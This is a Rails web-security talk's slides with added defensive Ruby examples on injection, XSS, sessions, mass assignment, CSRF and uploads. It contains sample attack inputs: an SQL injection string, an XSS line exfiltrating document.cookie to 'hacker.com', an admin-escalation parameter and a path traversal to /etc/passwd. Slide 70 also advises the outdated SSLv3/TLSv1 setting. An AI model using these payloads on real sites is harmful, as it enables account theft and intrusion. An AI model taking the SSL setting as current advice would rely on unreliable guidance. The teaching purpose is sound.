Slide 1

Securing your site. @bob_p

Slide 2

How Secure?

Slide 3

SQL injection

Slide 4

http://xkcd.com/327/

Slide 5

No content

Slide 6

User.where("email = '#{params[:email]}'").first
User.first(:conditions => "email = '#{params[:email]}'")

SELECT "users".* FROM "users" WHERE (email = '' OR 1='1') LIMIT 1

Slide 7

User.find_by_email(params[:email])
User.where("email = ?", params[:email]).first
User.first(:conditions => ["email = ?", params[:email]])
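An added example, not part of the original slides, showing what the interpolated query on slide 6 and the "?" placeholder form on slide 7 each produce for the same input. The small binder and quote_literal helper are stand-ins for ActiveRecord's quoting, and the attacker value is constructed; no database is needed.

```ruby
# Vulnerable form from slide 6: the parameter is pasted straight into the SQL,
# so a quote in the input terminates the literal and the rest becomes syntax.
def interpolated_query(email)
  "SELECT \"users\".* FROM \"users\" WHERE (email = '#{email}') LIMIT 1"
end

# Quote one value as a SQL string literal: wrap in quotes and double any
# embedded quote so the input can never close the literal early.
def quote_literal(value)
  "'" + value.to_s.gsub("'", "''") + "'"
end

# Placeholder form from slide 7: each "?" is replaced by a quoted value, so
# whatever the user sends stays data and never becomes part of the query text.
# (Simplified stand-in for ActiveRecord's binding, written for this example.)
def bound_query(template, *values)
  unless template.count("?") == values.size
    raise ArgumentError, "placeholder/value count mismatch"
  end
  vals = values.dup
  where = template.gsub("?") { quote_literal(vals.shift) }
  "SELECT \"users\".* FROM \"users\" WHERE (#{where}) LIMIT 1"
end

# Constructed attacker input: the value that yields slide 6's generated SQL.
ATTACK = "' OR 1='1"

if __FILE__ == $0
  puts interpolated_query(ATTACK)   # WHERE (email = '' OR 1='1') -> matches everyone
  puts bound_query("email = ?", ATTACK)   # WHERE (email = ''' OR 1=''1') -> one literal
end
```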

Slide 8

Summary
  Sanitise all SQL input

Slide 9

XSS
alert('h4x0r3d');

Slide 10

alert('h4x0r3d');
document.write('<img src="http://hacker.com/' + document.cookie + '">');

Slide 11

Secure your cookies
cookies(:secure_cookie, :httponly => true, :secure => true)

Slide 12

Escape output (< 3)
html_escape("")

Slide 13

SafeBuffer (> 3)
"hello".html_safe?

Slide 14

SafeBuffer (> 3)
raw("hello")
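An added example, not from the original slides, covering slides 12 to 14: manual html_escape as used before SafeBuffer existed, and a deliberately small SafeBuffer stand-in (this example's own, not the Rails class) that shows the rule html_safe? and raw express, namely that a buffer escapes whatever is not marked safe. The render_comment helper and the payload are constructed.

```ruby
require "erb"

# Minimal stand-in for ActiveSupport::SafeBuffer: a String that is trusted,
# and that escapes any untrusted String appended to it.
class SafeBuffer < String
  def html_safe?
    true
  end

  # Appending a SafeBuffer passes it through; appending a plain String escapes it.
  def <<(other)
    safe = other.respond_to?(:html_safe?) && other.html_safe?
    super(safe ? other : ERB::Util.html_escape(other))
  end
end

class String
  # Plain strings are untrusted until explicitly marked (Rails adds the same API).
  def html_safe?
    false
  end

  def html_safe
    SafeBuffer.new(self)
  end
end

# Slide 12 (< 3): escape by hand wherever untrusted text is rendered.
def escape_output(text)
  ERB::Util.html_escape(text)
end

# Slide 14 (> 3): raw marks a string as safe so the buffer will not escape it.
def raw(text)
  text.html_safe
end

# A template body: developer markup is passed through raw, user text is not.
def render_comment(trusted_markup, user_text)
  buf = SafeBuffer.new("")
  buf << raw(trusted_markup)   # developer-controlled, rendered as-is
  buf << user_text             # untrusted, escaped on append
  buf
end

# Constructed payload from slide 9.
PAYLOAD = "<script>alert('h4x0r3d');</script>"
```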

Slide 15

Summary
  Secure your cookies
  Ensure user submitted input is sanitised

Slide 16

Session management

Slide 17

Session stores
Rails.application.config.session_store :cookie_store
Rails.application.config.session_store :cache_store
Rails.application.config.session_store :active_record_store

Slide 18

config.secret_token = '3783262ab68df94a79ab02edca8a1a9c3....'
`rake secret`

Slide 19

XSS

Slide 20

Insecure networks
Image from http://codebutler.com/

Slide 21

Rails.application.config.force_ssl = true

Slide 22

Allow logout

Slide 23

Timeout

Slide 24

MyApp::Application.config.session_store :cookie_store, :key => '_my_key', :expire_after => 45.minutes

class User < ActiveRecord::Base
  devise :authenticatable, :timeoutable, :timeout_in => 45.minutes
end

Slide 25

reset_session

Slide 26

No concurrent logins

Slide 27

Account lockout

Slide 28

Password complexity

Slide 29

Destroy session on logout
def logout
  reset_session
end

Slide 30

Hash passwords
class User
  def password=(password)
    self.encrypted_password = ::BCrypt::Engine.hash_secret(password, self.salt)
  end
end

Slide 31

http://codahale.com/how-to-safely-store-a-password/
Use bcrypt

Slide 32

No large objects

Slide 33

No critical data

Slide 34

Summary
  SSL
  Hash data
  Clear sessions

Slide 35

Mass Assignment
"public_key" => {"user_id" => 4223}

Slide 36

https://github.com/blog/1068-public-key-security-vulnerability-and-mitigation

Slide 37

def signup
  @user = User.create(params[:user])
end

params[:user] = {:username => "pwn3d", :admin => true}

Slide 38

class User
  attr_protected :admin
end

Slide 39

class User
  attr_accessible :email
end

config.active_record.whitelist_attributes = true

Slide 40

class User
  attr_accessible :role, :as => :admin
end

Slide 41

User.create({:username => 'Bob', :role => "admin"}, :as => :admin)

Slide 42

def signup
  @user = User.create(user_params)
end

def user_params
  params[:user].slice(:email)
end
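An added example, not from the original slides, that ties slides 37 to 42 together: a small Model class with an attr_accessible style whitelist, a role-scoped whitelist (:as => :admin), and the slice pattern in front of it. The Model and User classes and the request hash are constructed for this illustration; they are not ActiveRecord.

```ruby
class MassAssignmentError < StandardError; end

# Minimal model: attributes may only be mass-assigned if whitelisted for the
# role the caller is acting as (:default unless given, like slide 40's :as).
class Model
  def self.attr_accessible(*names, as: :default)
    @accessible ||= Hash.new { |h, k| h[k] = [] }
    @accessible[as].concat(names.map(&:to_sym))
  end

  def self.accessible_for(role)
    @accessible ? @accessible[role] : []
  end

  attr_reader :attributes

  # Every key in attrs is checked against the whitelist; anything else is
  # rejected outright rather than silently written (slide 37's :admin => true).
  def initialize(attrs = {}, as: :default)
    @attributes = {}
    allowed = self.class.accessible_for(as)
    attrs.each do |key, value|
      unless allowed.include?(key.to_sym)
        raise MassAssignmentError, "#{key} is not accessible as #{as}"
      end
      @attributes[key.to_sym] = value
    end
  end
end

class User < Model
  attr_accessible :email, :username                 # slide 39: public signup
  attr_accessible :email, :username, :role, as: :admin   # slide 40: admin only
end

# Slide 42's slice pattern: the controller decides which keys may reach the model.
def user_params(params)
  params[:user].slice(:email, :username)
end

# Constructed request parameters, as on slide 37.
ATTACK_PARAMS = { user: { username: "pwn3d", admin: true } }
```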

Slide 43

https://github.com/rails/strong_parameters

Slide 44

Summary
  attr_accessible
  Slice pattern
  attr_protected

Slide 45

Direct object reference
/users/:id/posts/:post_id

Slide 46

def create
  @user = User.find(params[:user_id])
  @note = Note.create(:user => @user, :text => params[:text])
end

Slide 47

def create
  @user = User.find(session[:user_id])
  @note = @user.notes.create(:text => params[:text])
end

Slide 48

def show
  @note = Note.find(params[:id])
end

Slide 49

def show
  @user = User.find(session[:user_id])
  @note = @user.notes.find(params[:id])
end

Slide 50

def show
  @user = User.find(session[:user_id])
  @note = Note.find(params[:id])
  if @note.editable_by?(@user)
    # Do things
  end
end
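An added example, not from the original slides, with in-memory stand-ins for User and Note that show why the unscoped lookup on slide 48 serves any note to any logged-in user, and how the association-scoped lookup on slide 49 and the editable_by? check on slide 50 close that hole. The classes, the NoteScope stand-in for the notes association, and the records are all constructed; nothing here is ActiveRecord.

```ruby
class NotFound < StandardError; end

class Note
  ALL = {}
  attr_reader :id, :user_id, :text
  def initialize(id, user_id, text)
    @id, @user_id, @text = id, user_id, text
    ALL[id] = self
  end

  # Unscoped lookup (slide 48): the id in the URL is the only thing checked.
  def self.find(id)
    ALL[id.to_i] or raise NotFound, "note #{id}"
  end

  # Per-record ownership check (slide 50) for when a note must be found unscoped.
  def editable_by?(user)
    user_id == user.id
  end
end

# Stand-in for the @user.notes association: find only sees this user's notes.
class NoteScope
  def initialize(user); @user = user; end

  def find(id)
    note = Note::ALL[id.to_i]
    raise NotFound, "note #{id}" unless note && note.user_id == @user.id
    note
  end
end

class User
  ALL = {}
  attr_reader :id
  def initialize(id); @id = id; ALL[id] = self; end
  def self.find(id); ALL[id.to_i] or raise NotFound, "user #{id}"; end
  def notes; NoteScope.new(self); end
end

def show_unscoped(params)           # slide 48: anyone can read any note
  Note.find(params[:id])
end

def show_scoped(session, params)    # slide 49: scoped to the session user
  User.find(session[:user_id]).notes.find(params[:id])
end

# Constructed data: two users with one note each.
User.new(1); User.new(2)
Note.new(10, 1, "alice's note"); Note.new(11, 2, "bob's note")
```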

Slide 51

Summary
  Find users from session
  Use scoping methods

Slide 52

CSRF

Slide 53

Slide 54

GET: Safe requests / queries
POST, PUT, DELETE: Changes resource / orders

Slide 55

Slide 56

class ApplicationController
  protect_from_forgery
end
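An added example, not from the original slides, showing the mechanism that protect_from_forgery (slide 56) relies on and why the verb split on slide 54 matters: a per-session random token is embedded in every form, and only requests with a state-changing verb must echo it back. The helper names, the session and params hashes, and the exception class (named after the one Rails raises) are this example's own.

```ruby
require "securerandom"

class InvalidAuthenticityToken < StandardError; end

SAFE_METHODS = %w[GET HEAD OPTIONS].freeze

# Issue the session's token once and reuse it; forms render it as a hidden field.
def csrf_token(session)
  session[:_csrf_token] ||= SecureRandom.base64(32)
end

# Compare without short-circuiting so a wrong token takes the same time
# regardless of how many leading bytes happen to match.
def secure_compare(a, b)
  return false unless a.is_a?(String) && b.is_a?(String) && a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Slide 54's rule: safe verbs must not change state, so only the others are
# checked. A missing session token or a missing/forged form token fails.
def verified_request?(method, session, params)
  return true if SAFE_METHODS.include?(method.to_s.upcase)
  return false unless session[:_csrf_token]
  secure_compare(session[:_csrf_token], params["authenticity_token"].to_s)
end

# What protect_from_forgery does before the action runs: verify or reject.
def handle(method, session, params)
  unless verified_request?(method, session, params)
    raise InvalidAuthenticityToken, "#{method} without a valid token"
  end
  :action_ran
end
```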

Slide 57

Summary
  Correct http verbs
  Rails CSRF protection

Slide 58

Redirection & file uploads

Slide 59

def login
  login_business
  redirect_to params[:from]
end

Slide 60

def login
  login_business
  redirect_to session[:from]
end

Slide 61

Sanitise file names

Slide 62

"../../../etc/passwd"

Slide 63

https://github.com/thoughtbot/paperclip/blob/master/lib/paperclip/attachment.rb#L435
def cleanup_filename(filename)
  filename.gsub(/[&$+,\/:;=?@<>\[\]\{\}\|\\\^~%# ]/, '_')
end
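An added example, not from the original slides, that runs the Paperclip cleanup_filename regex from slide 63 over the traversal path on slide 62, and adds a basename step in front of it. The safe_upload_name wrapper is this example's own addition, not Paperclip's; the inputs are constructed.

```ruby
# Paperclip's filter as shown on slide 63: every path separator and shell or
# URL metacharacter becomes an underscore, so the name can no longer climb out
# of the upload directory.
def cleanup_filename(filename)
  filename.gsub(/[&$+,\/:;=?@<>\[\]\{\}\|\\\^~%# ]/, "_")
end

# Added wrapper: drop any directory part first (treating backslashes as
# separators too, since a Windows client may send them), refuse the bare
# "." and ".." names, then apply the character filter to what is left.
def safe_upload_name(user_supplied)
  base = File.basename(user_supplied.to_s.tr("\\", "/"))
  base = "upload" if base.empty? || base == "." || base == ".."
  cleanup_filename(base)
end
```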

Slide 64

Sanitise file type

Slide 65

class User
  validates_attachment :avatar,
    :presence => true,
    :content_type => { :content_type => "image/jpg" },
    :size => { :in => 0..10.kilobytes }
end

Slide 66

Process asynchronously

Slide 67

Summary
  No redirect locations in params
  Sanitise file name/type
  Process files a-sync

Slide 68

SSL

Slide 69

Rails.application.config.force_ssl = true

Slide 70

ssl_ciphers HIGH:!aNULL:!MD5;
ssl_protocols SSLv3 TLSv1;

Slide 71

Summary
  Use SSL!

Slide 72

Admin & intranet

Slide 73

CSRF

Slide 74

XSS

Slide 75

Whitelist.contains?(request.remote_ip)
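An added example, not from the original slides, showing one way to implement the Whitelist.contains?(request.remote_ip) check from slide 75 with IPAddr from Ruby's standard library. The Whitelist class, the CIDR ranges and admin_allowed? are constructed for this illustration.

```ruby
require "ipaddr"

class Whitelist
  def initialize(cidrs)
    @ranges = cidrs.map { |cidr| IPAddr.new(cidr) }
  end

  # True when the address (an IPv4 or IPv6 literal) lies inside any allowed
  # range. A malformed address counts as not allowed instead of raising, and
  # v4 ranges are never compared against v6 addresses or vice versa.
  def contains?(address)
    ip = IPAddr.new(address.to_s)
    @ranges.any? { |range| range.family == ip.family && range.include?(ip) }
  rescue IPAddr::InvalidAddressError
    false
  end
end

# Constructed ranges: office LAN, one VPN subnet and loopback only.
ADMIN_WHITELIST = Whitelist.new(%w[10.0.0.0/8 192.168.1.0/24 127.0.0.1 ::1])

# Caveat: request.remote_ip is taken from X-Forwarded-For when Rails sits
# behind a proxy, so this check is only as trustworthy as the proxy setup.
def admin_allowed?(remote_ip)
  ADMIN_WHITELIST.contains?(remote_ip)
end
```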

Slide 76

Summary
  XSS / CSRF / Injection
  Restrict access

Slide 77

Info leakage

Slide 78

server_tokens off;

Slide 79

No content

Slide 80

Summary
  Don't give away anything

Slide 81

Server-side

Slide 82

User privileges

Slide 83

config.filter_parameters += [:password]

Slide 84

Summary
  Restrict user permissions
  Obscure sensitive data

Slide 85

Resources

Slide 86

guides.rubyonrails.org/security.html

Slide 87

www.rorsecurity.info

Slide 88

brakemanscanner.org

Slide 89

github.com/relevance/tarantula

Slide 90

www.owasp.org

Slide 91

@bob_p
http://mintdigital.com
Colour palette: http://www.colourlovers.com/lover/electrikmonk/loveNote
Thanks!